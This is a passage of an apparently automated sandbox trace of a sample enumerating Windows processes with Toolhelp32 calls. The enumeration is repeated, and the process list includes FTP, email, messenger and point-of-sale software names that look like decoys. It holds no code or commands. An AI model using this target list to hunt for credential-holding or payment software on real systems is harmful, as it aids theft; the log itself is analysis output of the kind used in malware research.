th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0216.680] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.682] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.842] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0216.844] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0216.846] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0216.848] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0216.850] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.852] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0216.853] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0216.858] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.859] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0216.861] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0216.862] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0216.864] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0216.866] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0216.868] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0216.869] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0216.931] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0216.937] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0216.940] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0216.942] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0216.945] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0216.947] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0216.979] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0216.980] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0216.982] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0216.983] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0216.984] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0216.986] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0216.987] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0216.989] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0216.990] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0216.991] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0216.993] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0217.063] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0217.065] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0217.067] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0217.068] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0217.070] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0217.072] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0217.076] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0217.078] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0217.079] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0217.081] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0217.083] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0217.084] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0217.086] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0217.087] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0217.095] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0217.097] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0217.099] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0217.101] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0217.103] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0217.152] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0217.154] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0217.156] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0217.157] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0217.159] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0217.161] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0217.162] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0217.164] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0217.165] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0217.167] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0217.169] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0217.170] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0217.172] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0217.173] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0217.175] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0217.176] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0217.178] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0217.179] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0217.181] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0217.182] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0217.184] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0217.185] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0217.187] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0217.188] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.190] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.191] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0217.193] CloseHandle (hObject=0x1018) returned 1 [0217.193] Sleep (dwMilliseconds=0x64) [0217.340] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0217.353] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.355] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.357] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.359] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.361] Process32Next (in: 